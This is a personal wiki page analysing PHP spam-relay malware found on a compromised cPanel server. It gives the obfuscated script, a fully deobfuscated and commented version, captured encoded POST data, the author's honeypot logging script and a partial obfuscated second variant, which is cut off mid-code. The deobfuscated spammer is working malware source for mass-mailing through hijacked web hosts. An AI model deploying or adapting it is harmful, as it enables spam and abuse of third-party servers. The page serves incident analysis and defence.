PHP Hacks

From Leo's Notes
Last edited on 24 February 2017, at 19:14.

These are the PHP hacks I've found in the wild. I'll post the raw and the deciphered form and a quick overview of what it does.


PHP Spammer

Exim on my cPanel server has been quite busy late. Too busy actually... Looking at the queue, it was clear someone was abusing the SMTP server. Most of the messages were sent from a PHP script called newsVfK.php. The contents of the script is given below.

<?php @error_reporting(0); @ini_set(chr(101).chr(114).'ror_log',NULL); @ini_set('log_errors',0); if (count($_POST) < 2) { die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); } $v5031e998 = false; foreach (array_keys($_POST) as $v3c6e0b8a) { switch ($v3c6e0b8a[0]) { case chr(108): $vd56b6998 = $v3c6e0b8a; break; case chr(100): $v8d777f38 = $v3c6e0b8a; break; case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; case chr(101); $v5031e998 = true; break; } } if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); $v01b6e203 = @$_POST[$vd56b6998]; $v8d777f38 = @$_POST[$v8d777f38]; $v3d26b0b1 = @$_POST[$v3d26b0b1]; if ($v5031e998) { $v01b6e203 = n9a2d8ce3($v01b6e203); $v8d777f38 = n9a2d8ce3($v8d777f38); $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); } $v01b6e203 = urldecode(stripslashes($v01b6e203)); $v8d777f38 = urldecode(stripslashes($v8d777f38)); $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); if (strpos($v01b6e203, '#',1) != false) { $v16a9b63f = preg_split('/#/', $v01b6e203); $ve2942a04 = count($v16a9b63f); } else { $v16a9b63f[0] = $v01b6e203; $ve2942a04 = 1; } for ($v865c0c0b=0; $v865c0c0b < $ve2942a04;$v865c0c0b++) { $v01b6e203 = $v16a9b63f[$v865c0c0b]; if ($v01b6e203 == '' || !strpos($v01b6e203,'@',1)) continue; if (strpos($v01b6e203, ';', 1) != false) { list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/',strtolower($v01b6e203)); $va3da707b = ucfirst($va3da707b); $vbfbb12dc = ucfirst($vbfbb12dc); $v3a5939e4 = next(explode('@', $v081bde0c)); if ($vbfbb12dc == '' || $va3da707b == '') { $vbfbb12dc = $va3da707b = ''; $v01b6e203 = $v081bde0c; } else { $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>"; } } else { $vbfbb12dc = $va3da707b = ''; $v081bde0c = strtolower($v01b6e203); $v3a5939e4 = next(explode('@', $v01b6e203)); } preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1); $vee11cbb1 = $vee11cbb1[1]; preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c); $vb068931c = $vb068931c[1]; preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9); $vc34487c9 = $vc34487c9[1]; preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42); $v6f4b5f42= $v6f4b5f42[1]; $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9); $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9); $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42); $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42); $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']); if (ne667da76($v0897acf4) || @ini_get('safe_mode')) $v10497e3f = false; else $v10497e3f = true; $v9a5cb5d8 = "$vee11cbb1@$v0897acf4"; if ($vb068931c != '') $vd98a07f8 = "$vb068931c <$v9a5cb5d8>"; else $vd98a07f8 = $v9a5cb5d8; $vb8ddc93f = "From: $vd98a07f8\r\n"; $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n"; $v3c87b187 = "X-Priority: 3 (Normal)\r\n"; $v3c87b187 .= "MIME-Version: 1.0\r\n"; $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n"; $v1e66f6b4 = 'ma'.chr(105).'l'; if (!in_array('m'.'a'.'il', $v619d75f8)) { if ($v10497e3f) { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f.$v3c87b187, "-f$v9a5cb5d8")) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } else { if (@$v1e66f6b4($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) { echo(chr(79).chr(75).md5(1234567890)."+0\n"); continue; } } } $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $vb8ddc93f; $v4340fd73 .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$v0897acf4>\r\n"; $v4340fd73 .= "To: $v01b6e203\r\n"; $v4340fd73 .= "Subject: $vc34487c9\r\n"; $v4340fd73 .= $v3c87b187; $v841a2d68 = $v4340fd73."\r\n".$v6f4b5f42; if ($v3d26b0b1 == '') $v3d26b0b1 = n9c812bad($v3a5939e4); if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) { echo(chr(79).chr(75).md5(1234567890)."+1\n"); continue; } else { echo PHP_OS.chr(50).chr(48).'+'.md5(0987654321)."+$vb4a88417\n"; } } function ne667da76($v957b527b){ return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b); } function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) { $vf5a8e923 = strlen($vb45cffe0); $vb4a88417 = ''; for($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) { if ($v11a95b8a >= 75) { $v11a95b8a = $v92f21a0f; $vb4a88417 .= $v7fa1b685; } $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]); if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) { if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) { $vb4a88417.=chr($v4a8a08f0); $v11a95b8a = 0; continue; } $vb4a88417 .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); $v11a95b8a += 3; continue; } $vb4a88417 .= chr($v4a8a08f0); $v11a95b8a++; } return $vb4a88417; } function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1) { global $v619d75f8; if (!in_array('fsockopen', $v619d75f8)) $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('pfsockopen', $v619d75f8)) $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20); elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client")) $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20); else return -1; if (!$v66b18866) { return 1; } else { $v8d777f38 = n54070395($v66b18866); @fputs($v66b18866, "EHLO $v0897acf4\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "2+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "3+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251) return "4+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "DATA\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 354 ) return "5+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, $v841a2d68."\r\n.\r\n"); $ve98d2f00 = n54070395($v66b18866); if (substr($ve98d2f00, 0, 3) != 250 ) return "6+($v01b6e203)+".preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00); @fputs($v66b18866, "QUIT\r\n"); @fclose($v66b18866); return 0; } } function n54070395($v66b18866) { $v8d777f38 = ''; while($v341be97d = @fgets($v66b18866, 4096)) { $v8d777f38 .= $v341be97d; if(substr($v341be97d, 3, 1) == ' ') break; } return $v8d777f38; } function n9c812bad($vad5f82e8) { global $v619d75f8; if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) { @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); if (count($v744fa43b) === 0) return '127.0.0.1'; $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816)); return $v744fa43b[$v865c0c0b[0]]; } else { return '127.0.0.1'; } } function n9a2d8ce3($v1cb251ec) { $v1cb251ec = base64_decode($v1cb251ec); $vc68271a6 = ''; for($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++) $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2); return $vc68271a6; } ?>

Here is the decoded version of the code above. I've replaced the random variable and function names with something more descriptive. I added a few comments throughout the code as well.

<?php
@error_reporting(0);
@ini_set("error_log", NULL);
@ini_set('log_errors', 0);

if (count($_POST) < 2) {
	die(PHP_OS."10+".md5(0987654321)); 
}
$is_encrypted = false; 

foreach (array_keys($_POST) as $value) {
	// the first character of each dictionary is used
	// to determine the key name.
	switch ($value[0]) {
		// list is the list of emails to send to
		case "l": $list_name = $value; break; 
		// data is the message to be send
		case "d": $spam_message_data = $value; break; 
		// mail?
		case "m": $mail_server = $value; break; 
		// en = encrypt?
		case "e"; $is_encrypted = true; break; 
	} 
}

if ($list_name === '' || $spam_message_data === '')
	die(PHP_OS."11+".md5(0987654321)); 

$disabled_functions = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); 
$target_emails = @$_POST[$list_name]; 
$spam_message_data = @$_POST[$spam_message_data]; 
$mail_server = @$_POST[$mail_server]; 

if ($is_encrypted) {
	$target_emails = decrypt_func($target_emails); 
	$spam_message_data = decrypt_func($spam_message_data); 
	$mail_server = decrypt_func($mail_server); 
}

$target_emails = urldecode(stripslashes($target_emails)); 
$spam_message_data = urldecode(stripslashes($spam_message_data)); 
$mail_server = urldecode(stripslashes($mail_server)); 



// target_emails looks something like this:
// bkmarie@aol.com#bkmarin@aol.com#bkmark0917@aol.com#bkmark940608895@aol.com#bkmark@aol.com#bkmarks65@aol.com#bkmarkwood@aol.com#bkmarohn@aol.com#bkmars@aol.com#bkmarsch@hotmail.com#

if (strpos($target_emails, '#',1) != false) {
	$email_list = preg_split('/#/', $target_emails);
	$email_list_count = count($email_list); 
} else {
	$email_list[0] = $target_emails;
	$email_list_count = 1; 
} 

for ($email_i=0; $email_i < $email_list_count; $email_i++) {
	$target_emails = $email_list[$email_i]; 
	
	if ($target_emails == '' || !strpos($target_emails,'@',1)) 
		continue; 
		
	if (strpos($target_emails, ';', 1) != false) {
		list($recipient_first_name, $recipient_last_name, $target_emails) = preg_split('/;/',strtolower($target_emails)); 
		$recipient_first_name = ucfirst($recipient_first_name); 
		$recipient_last_name = ucfirst($recipient_last_name); 
		$target_emails_domain = next(explode('@', $target_emails)); 
		if ($recipient_last_name == '' || $recipient_first_name == '') {
			$recipient_last_name = $recipient_first_name = ''; $target_emails = $target_emails;
		} else {
			$target_emails = "\"$recipient_first_name $recipient_last_name\" <$target_emails>"; 
		} 
	} else {
		$recipient_last_name = $recipient_first_name = ''; 
		$target_emails = strtolower($target_emails); 
		$target_emails_domain = next(explode('@', $target_emails)); 
	} 

	/*
	 * the spam message will look something like this:
	 
<USER>elma_reed</USER>
<NAME>"Elma Reed"</NAME>
<SUBJ>Fw:  Hello</SUBJ>
<SBODY>
<div>
<p>
 Quality Med Online Supplies best chance to save <a href="http://teatr05.ru/Video___Foto_files/rcf.html">http://teatr05.ru/Video___Foto_files/rcf.html</a>
</p>
</div>
</SBODY>

	*/
	
	preg_match('|<USER>(.*)</USER>|imsU', $spam_message_data, $sender_username); 
	$sender_username = $sender_username[1]; 
	preg_match('|<NAME>(.*)</NAME>|imsU', $spam_message_data, $sender_name);
	$sender_name = $sender_name[1]; 
	preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $spam_message_data, $spam_subject);
	$spam_subject = $spam_subject[1];
	preg_match('|<SBODY>(.*)</SBODY>|imsU', $spam_message_data, $spam_message);
	
	$spam_message = $spam_message[1];
	$spam_subject = str_replace("%R_NAME%", $recipient_first_name, $spam_subject);
	$spam_subject = str_replace("%R_LNAME%", $recipient_last_name, $spam_subject);
	$spam_message = str_replace("%R_NAME%", $recipient_first_name, $spam_message);
	$spam_message = str_replace("%R_LNAME%", $recipient_last_name, $spam_message);
	$sender_mail_server = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
	
	if (ne667da76($sender_mail_server) || @ini_get('safe_mode'))
		$can_send_X_headers = false; 
	else $can_send_X_headers = true; 
	
	$sender_email = "$sender_username@$sender_mail_server"; 
	
	if ($sender_name != '') 
		$sender_email = "$sender_name <$sender_email>"; 
	else $sender_email = $sender_email; 

	$mail_header = "From: $sender_email\r\n"; 
	$mail_header .= "Reply-To: $sender_email\r\n"; 
	$mail_header2 = "X-Priority: 3 (Normal)\r\n"; 
	$mail_header2 .= "MIME-Version: 1.0\r\n"; 
	$mail_header2 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n"; 
	$mail_header2 .= "Content-Transfer-Encoding: 8bit\r\n"; 
	$mail_func = 'mail'; 

	// If mail() is available, use it to email
	if (!in_array('mail', $disabled_functions)) {
		if ($can_send_X_headers) {
			if (@$mail_func($target_emails, $spam_subject, $spam_message, $mail_header.$mail_header2, "-f$sender_email")) {
				echo("OK".md5(1234567890)."+0\n");
				continue; 
			} 
		} else {
			if (@$mail_func($target_emails, $spam_subject, $spam_message, $mail_header2)) {
				echo("OK".md5(1234567890)."+0\n");
				continue; 
			} 
		} 
	}
	
	// Use custom SMTP mailer if mail() is not available
	$smtp_headers = "Date: " . @date("D, j M Y G:i:s O")."\r\n" . $mail_header;
	$smtp_headers .= "Message-ID: <".preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time()))."@$sender_mail_server>\r\n";
	$smtp_headers .= "To: $target_emails\r\n"; 
	$smtp_headers .= "Subject: $spam_subject\r\n"; 
	$smtp_headers .= $mail_header2; 
	$smtp_data = $smtp_headers."\r\n".$spam_message; 

	// If no mail server was specified from the POST request, determine one that can be used
	if ($mail_server == '') 
		$mail_server = get_mail_server_func($target_emails_domain); 

	if (($mailer_func_return_code = custom_mailer_func($sender_email, $target_emails, $smtp_data, $sender_mail_server, $mail_server)) == 0) {
		echo("OK".md5(1234567890)."+1\n"); 
		continue; 
	} else {
		echo PHP_OS."20+".md5(0987654321)."+$mailer_func_return_code\n"; 
	} 

} // end main email mailer loop





function ne667da76($server){
	return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $server); 
} 

// defined but not used
function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685="=\r\n", $v92f21a0f = 0, $v3303c65a = false) {
	$vf5a8e923 = strlen($vb45cffe0); 
	$mailer_func_return_code = ''; 
	
	for($email_i = 0;  $email_i < $vf5a8e923; $email_i++) {
		if ($v11a95b8a >= 75) {
			$v11a95b8a = $v92f21a0f; 
			$mailer_func_return_code .= $v7fa1b685; 
		} 
		$v4a8a08f0 = ord($vb45cffe0[$email_i]); 
		if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
			if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
				$mailer_func_return_code.=chr($v4a8a08f0); 
				$v11a95b8a = 0; continue; 
			} 
			$mailer_func_return_code .='='.str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT); 
			$v11a95b8a += 3; continue; 
		} 
		
		$mailer_func_return_code .= chr($v4a8a08f0); $v11a95b8a++; 
	} 
	return $mailer_func_return_code; 
} 

// Uses fsockopen to talk to a SMTP server in order to send emails
function custom_mailer_func($sender_email, $target_emails, $smtp_data, $sender_mail_server, $mail_server) {
	global $disabled_functions; 

	if (!in_array('fsockopen', $disabled_functions)) 
		$socket = @fsockopen($mail_server, 25, $errno, $errstr, 20); 
	elseif (!in_array('pfsockopen', $disabled_functions)) 
		$socket = @pfsockopen($mail_server, 25, $errno, $errstr, 20); 
	elseif (!in_array('stream_socket_client', $disabled_functions) && function_exists("stream_socket_client")) 
		$socket = @stream_socket_client("tcp://$mail_server:25", $errno, $errstr, 20); 
	else return -1; 
	
	if (!$socket) {
		return 1; 
	} else {
		$spam_message_data = dump_socket_data_func($socket); 
		@fputs($socket, "EHLO $sender_mail_server\r\n"); 
		$socket_data = dump_socket_data_func($socket); 
		
		if (substr($socket_data, 0, 3) != 250 ) 
			return "2+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data); 
		@fputs($socket, "MAIL FROM:<$sender_email>\r\n"); 
		$socket_data = dump_socket_data_func($socket); 

		if (substr($socket_data, 0, 3) != 250 ) 
			return "3+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data);
		@fputs($socket, "RCPT TO:<$target_emails>\r\n"); 
		$socket_data = dump_socket_data_func($socket); 
		if (substr($socket_data, 0, 3) != 250 && substr($socket_data, 0, 3) != 251) 
			return "4+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data); 

		@fputs($socket, "DATA\r\n"); $socket_data = dump_socket_data_func($socket); 
		if (substr($socket_data, 0, 3) != 354 ) 
			return "5+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data); 
			
		@fputs($socket, $smtp_data."\r\n.\r\n"); 
		$socket_data = dump_socket_data_func($socket); 

		if (substr($socket_data, 0, 3) != 250 ) 
			return "6+($target_emails)+".preg_replace('/(\r\n|\r|\n)/', '|', $socket_data);
			
		@fputs($socket, "QUIT\r\n");
		@fclose($socket); 
		return 0; 
	} 

} 

function dump_socket_data_func($socket) {
	$spam_message_data = ''; 
	while($data = @fgets($socket, 4096)) {
		$spam_message_data .= $data; 
		if(substr($data, 3, 1) == ' ')
			break; 
	} 

	return $spam_message_data; 
} 

function get_mail_server_func($vad5f82e8) {
	global $disabled_functions; 
	if (!in_array('getmxrr', $disabled_functions) && function_exists("getmxrr")) {
		@getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816); 
		if (count($v744fa43b) === 0) 
			return '127.0.0.1'; 
		
		$email_i = array_keys($v6c5ea816, min($v6c5ea816)); 
		return $v744fa43b[$email_i[0]]; 
	} else {
		return '127.0.0.1';
	} 
}

function decrypt_func($cyphertext) {
	$cyphertext = base64_decode($cyphertext); 
	$text = ''; 
	for($i = 0; $i < strlen($cyphertext); $i++) 
		$text .= chr(ord($cyphertext[$i]) ^ 2); 
	return $text; 
} 

?>

I also captured the POST values that are being sent to the script:

208.43.56.34Array
(
    [list] => YGlvY3BrZ0JjbW4sYW1vIWBpb2Nwa2xCY21uLGFtbyFgaW9jcGkyOzM1QmNtbixhbW8hYGlvY3BpOzYyNDI6Ojs3QmNtbixhbW8hYGlvY3BpQmNtbixhbW8hYGlvY3BpcTQ3QmNtbixhbW8hYGlvY3BpdW1tZkJjbW4sYW1vIWBpb2NwbWpsQmNtbixhbW8hYGlvY3BxQmNtbixhbW8hYGlvY3BxYWpCam12b2NrbixhbW8h
    [data] => PldRR1A8Z25vY11wZ2dmPi1XUUdQPAg+TENPRzwgR25vYyJQZ2dmID4tTENPRzwIPlFXQEg8RHU4IiJKZ25ubT4tUVdASDwIPlFATUZbPAg+Zmt0PAg+cjwIIlN3Y25rdnsiT2dmIk1sbmtsZyJRd3JybmtncSJgZ3F2ImFqY2xhZyJ2bSJxY3RnIj5jImpwZ2Q/IGp2dnI4LS12Z2N2cDI3LHB3LVRrZmdtXV1dRG12bV1ka25ncS1wYWQsanZvbiA8anZ2cjgtLXZnY3ZwMjcscHctVGtmZ21dXV1EbXZtXWRrbmdxLXBhZCxqdm9uPi1jPAg+LXI8CD4tZmt0PAg+LVFATUZbPA==
    [en] => 1
)

list is the list of emails to spam. data contains the actual spam data including the sender name, subject, and the spam message. There is a special 'decryption' function in the code that does a few transformations on the text that's given as to obfuscate what's actually going on.

Interestingly, this page appears to be hit by random servers, possibly servers that have been hijacked. There were a few hundred unique IPs hitting this script. Unfortunately, I couldn't find anything else on the compromised account which propagates these POST requests to other servers.

Just for fun, I've made a script to gather the data being sent while giving the spammers false feedback that the script is still working:

<?php
// log data
ob_start();
echo $_SERVER['REMOTE_ADDR'];
print_r($_POST);
$data = ob_get_contents();
ob_clean();

// save it to /tmp
$fp = fopen("/tmp/postdata", "a+");
fwrite($fp, $data);
fclose($fp);

// give them fake return statuses
$emails = decrypt_func(@$_POST['list']);
$email_count = count(explode("#", $emails));

for ($i = 0; $i < $email_count; $i++) {
        echo("O"."K".md5(1234567890)."+1\n");
}

function decrypt_func($cyphertext) {
        $cyphertext = base64_decode($cyphertext);
        $text = '';
        for($i = 0; $i < strlen($cyphertext); $i++)
                $text .= chr(ord($cyphertext[$i]) ^ 2);
        return $text;
}

We'll see how long this keeps on going...

Update: It appears that this is part of a botnet. See http://blog.trendmicro.com/trendlabs-security-intelligence/how-to-check-if-your-website-is-part-of-the-stealrat-botnet/



PHP Spammer v2.0

There appears to be a slightly more sophisticated version from the same botnet. It uses the same encoding and API to send mail, but utilizes sockets before falling back to using the system's mail() call.

The original obfuscated PHP code and the deobfuscated code can be seen below:

$r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] = $r76[27].$r76[49].$r76[58].$r76[66].$r76[87].$r76[90].$r76[58].$r76[87]; $GLOBALS['nhnww15'] = $r76[58].$r76[41].$r76[45].$r76[7].$r76[53].$r76[23].$r76[76]; $GLOBALS['igajs32'] = $r76[41].$r76[49].$r76[87].$r76[27].$r76[27].$r76[76].$r76[76]; $GLOBALS['cpukq94'] = $r76[49].$r76[78].$r76[90].$r76[45].$r76[7].$r76[18].$r76[14]; $GLOBALS['bdonk12'] = $r76[36].$r76[43].$r76[61].$r76[96].$r76[49].$r76[18].$r76[18]; $GLOBALS['aurku4'] = $r76[53].$r76[49].$r76[20].$r76[61].$r76[49].$r76[46].$r76[15]; $GLOBALS['yqqkt30'] = $r76[7].$r76[45].$r76[58].$r76[27].$r76[87].$r76[53].$r76[49].$r76[58].$r76[54].$r76[94].$r76[20].$r76[53].$r76[66].$r76[87].$r76[66]; $GLOBALS['tnmsd36'] = $r76[78].$r76[90].$r76[53].$r76[5]; $GLOBALS['chqql44'] = $r76[90].$r76[24].$r76[78].$r76[87].$r76[20].$r76[31].$r76[46]; $GLOBALS['cvtxr40'] = $r76[94].$r76[27].$r76[69].$r76[43].$r76[66].$r76[31].$r76[52]; $GLOBALS['eavur97'] = $r76[45].$r76[66].$r76[5].$r76[94].$r76[94].$r76[41]; $GLOBALS['ptlaz26'] = $r76[45].$r76[24].$r76[70].$r76[7].$r76[45].$r76[14].$r76[18]; $GLOBALS['xcnkh30'] = $r76[20].$r76[5].$r76[5].$r76[94].$r76[35].$r76[52]; $GLOBALS['wnlxd28'] = $r76[87].$r76[24].$r76[53].$r76[78]; $GLOBALS['laepm94'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['nxseo15'] = $r76[61].$r76[94].$r76[87].$r76[36].$r76[49].$r76[66].$r76[87].$r76[96].$r76[69].$r76[58].$r76[90].$r76[78].$r76[94]; $GLOBALS['cyzbs96'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36]; $GLOBALS['yoejz48'] = $r76[24].$r76[35].$r76[94].$r76[29].$r76[61].$r76[31].$r76[15]; $GLOBALS['lzjpr73'] = $r76[43].$r76[95].$r76[87].$r76[47].$r76[7].$r76[23].$r76[18]; $GLOBALS['osnjl91'] = $r76[24].$r76[20].$r76[24].$r76[78].$r76[41].$r76[14].$r76[52]; $GLOBALS['zhjzv93'] = $r76[41].$r76[24].$r76[27].$r76[45].$r76[20].$r76[85].$r76[14]; $GLOBALS['brkww19'] = $r76[66].$r76[87].$r76[24].$r76[5].$r76[94].$r76[58]; $GLOBALS['yhcum29'] = $r76[49].$r76[69].$r76[69].$r76[66].$r76[61].$r76[18].$r76[52]; $GLOBALS['ibere91'] = $r76[7].$r76[49].$r76[7].$r76[87].$r76[61].$r76[46].$r76[14]; $GLOBALS['vszxc90'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[29].$r76[94].$r76[69].$r76[66]; $GLOBALS['qtgcq90'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[5].$r76[94].$r76[27].$r76[87]; $GLOBALS['bwpvf88'] = $r76[45].$r76[27].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]; $GLOBALS['bdvxl14'] = $r76[66].$r76[87].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['xizmx47'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[61].$r76[94].$r76[87]; $GLOBALS['stkuy98'] = $r76[70].$r76[29].$r76[90].$r76[84].$r76[84].$r76[15].$r76[18]; $GLOBALS['duiid33'] = $r76[95].$r76[90].$r76[87].$r76[94]; $GLOBALS['grxdw62'] = $r76[61].$r76[94].$r76[87].$r76[78].$r76[20].$r76[24].$r76[24]; $GLOBALS['nvuxa92'] = $r76[69].$r76[96].$r76[94].$r76[43].$r76[69].$r76[18].$r76[18]; $GLOBALS['ysmvf63'] = $r76[78].$r76[53].$r76[58]; $GLOBALS['vbhwy58'] = ${$r76[54].$r76[3].$r76[17].$r76[55].$r76[67]}; $GLOBALS['wdbfr89'] = $r76[7].$r76[94].$r76[43].$r76[7].$r76[20].$r76[85].$r76[52]; $GLOBALS['vxogc32'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[66].$r76[41].$r76[5].$r76[53].$r76[87]; $GLOBALS['inenw32'] = $r76[20].$r76[43].$r76[66].$r76[94].$r76[66].$r76[46].$r76[85]; $GLOBALS['xyxdn38'] = $r76[27].$r76[36].$r76[24]; $GLOBALS['rtdlc97'] = $r76[49].$r76[24].$r76[95]; $GLOBALS['cnrfe78'] = $r76[45].$r76[24].$r76[5].$r76[95].$r76[94].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['wzekj92'] = $r76[66].$r76[87].$r76[24].$r76[53].$r76[41].$r76[66].$r76[5].$r76[90].$r76[66].$r76[36].$r76[94].$r76[66]; $GLOBALS['yrqxp89'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[7].$r76[5].$r76[53].$r76[41]; $GLOBALS['xavtv19'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36].$r76[54].$r76[90].$r76[5].$r76[5]; $GLOBALS['zjheh80'] = $r76[96].$r76[90].$r76[66].$r76[94].$r76[23].$r76[85].$r76[54].$r76[94].$r76[58].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['gisxn89'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[24].$r76[94].$r76[90].$r76[87].$r76[94]; $GLOBALS['oqikt29'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[5].$r76[90].$r76[66].$r76[87].$r76[54].$r76[94].$r76[24].$r76[24].$r76[49].$r76[24]; $GLOBALS['tvxvt28'] = 